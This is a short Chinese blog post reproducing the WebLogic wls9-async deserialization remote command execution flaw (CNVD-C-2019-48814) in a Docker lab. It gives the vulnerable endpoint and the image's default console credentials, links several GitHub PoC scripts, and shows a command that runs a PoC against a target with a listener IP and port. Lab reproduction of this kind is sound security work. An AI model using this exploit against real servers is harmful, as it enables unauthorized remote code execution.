CNVD-C-2019-48814 复现

作者: print("") 分类: 未分类 发布时间: 2019-04-26 11:16

CNVD-C-2019-48814

WebLogic wls9-async反序列化远程命令执行漏洞

Docker 搭建环境

docker pull ismaleiva90/weblogic12

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest
http://localhost:49163/console
User: weblogic
Pass: welcome1

http://xx.xx.xx.xxx:49163/_async/AsyncResponseService

poc 脚本

https://github.com/fuhei/CNVD-C-2019-48814/blob/master/CNVD-C-2019-48814.py

执行:

python2 C:\Users\ben\Desktop\扫描\4884\poc.py -l xxx.xxx.xx.125 -p 4848 -r http://xxx.xx.xxx.xx:49163

另外无回显的方式,可以用少宇师傅的如下:

https://github.com/jas502n/CNVD-C-2019-48814

还有另外一种方式

https://github.com/greekn/CNVD-C-2019-48814

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

说点什么

avatar
  Subscribe  
提醒